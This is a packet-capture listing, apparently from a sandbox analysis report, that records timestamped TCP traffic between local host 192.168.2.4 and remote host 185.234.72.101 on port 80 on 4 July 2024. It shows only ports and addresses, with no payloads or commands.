                  Jul 4, 2024 03:12:30.728044033 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728048086 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728053093 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728066921 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.728127956 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.728979111 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728985071 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.728996038 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729000092 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729005098 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729008913 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729013920 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729027987 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.729054928 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.729054928 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.729909897 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729914904 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729923964 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729928970 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729937077 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729942083 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729948044 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.729980946 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.730009079 CEST4975480192.168.2.4185.234.72.101
                  Jul 4, 2024 03:12:30.730899096 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730904102 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730914116 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730918884 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730923891 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730927944 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730937958 CEST8049754185.234.72.101192.168.2.4
                  Jul 4, 2024 03:12:30.730957031 CEST4975480192.168.2.4185.234.72.101
Jul 4, 2024 03:12:30.730974913 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.730974913 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.731854916 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731861115 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731877089 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731882095 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731885910 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731890917 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731894970 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731899977 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.731914997 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.731978893 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.732814074 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732820034 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732831001 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732836008 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732844114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732847929 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732852936 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.732860088 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.732960939 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.733644962 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733650923 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733654976 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733659029 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733664036 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733669043 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733673096 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733684063 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.733714104 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.733714104 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.733764887 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.734492064 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734498978 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734508991 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734514952 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734519958 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734525919 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734536886 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734541893 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734545946 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.734555960 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.734572887 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.734611034 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.775059938 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775149107 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775154114 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775163889 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.775238037 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.775363922 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775470972 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.775471926 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775479078 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775490046 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775492907 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.775546074 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.775546074 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.805949926 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.805989981 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.805995941 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806024075 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.806051970 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.806197882 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806204081 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806215048 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806349039 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.806528091 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806533098 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806600094 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806608915 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806612015 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806617975 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806626081 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.806638002 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.806670904 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.806670904 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.807287931 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807410955 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.807444096 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807450056 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807527065 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.807712078 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807717085 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807728052 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807733059 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.807836056 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.808197975 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.808203936 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.808281898 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.809091091 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809216976 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809221029 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809242010 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.809300900 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.809453011 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809458017 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809468985 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809556961 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.809741020 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.809832096 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.815960884 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816066027 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816071033 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816102028 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.816131115 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.816318035 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816323042 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816329002 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816334009 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816411972 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.816859007 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816864967 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816875935 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816879988 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816884995 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816890001 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816900015 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.816920996 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.816920996 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.816976070 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.819700956 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819710016 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819736004 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819741011 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819745064 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819750071 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819755077 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819766045 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.819777966 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.819868088 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.820200920 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820209026 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820214033 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820218086 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820223093 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820226908 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820238113 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820242882 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.820261002 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.820261002 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.820314884 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.821131945 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821136951 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821147919 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821152925 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821157932 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821168900 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821172953 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821177959 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.821191072 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.821203947 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.821203947 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.821265936 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.822097063 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822102070 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822113037 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822118044 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822129011 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822133064 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822138071 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822143078 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.822161913 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.822161913 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.822243929 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823085070 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823090076 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823100090 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823105097 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823108912 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823113918 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823118925 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823129892 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823149920 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823149920 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823201895 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823817015 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823822021 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823832989 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823837996 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823842049 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823847055 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823857069 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823862076 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823867083 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823872089 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823874950 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823874950 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823877096 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.823904037 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.823973894 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.824769974 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824774981 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824785948 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824790955 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824795008 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824800014 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824804068 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824810028 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824814081 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824819088 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.824835062 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.824872017 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865077019 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865187883 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865205050 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865216970 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865252018 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865420103 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865437031 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865487099 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865487099 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865488052 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865494967 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865535021 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865535021 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.865871906 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.865956068 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.896630049 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.896764994 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.896775961 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.896800041 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.896835089 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.896981001 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.896992922 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897005081 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897017002 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897032976 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.897079945 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.897564888 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897577047 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897588968 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897600889 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897635937 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.897660017 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.897926092 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.897938967 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898057938 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.898250103 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898272991 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898292065 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898303986 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898314953 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898319960 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.898330927 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898350000 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.898350000 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.898380995 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.898447037 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.899003029 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899183989 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.899199963 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899260998 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899272919 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899285078 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.899317026 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.899317980 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.899514914 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899527073 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899538994 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899552107 CEST | 80 | 49754 | 185.234.72.101 | 192.168.2.4
Jul 4, 2024 03:12:30.899574041 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
Jul 4, 2024 03:12:30.899600983 CEST | 49754 | 80 | 192.168.2.4 | 185.234.72.101
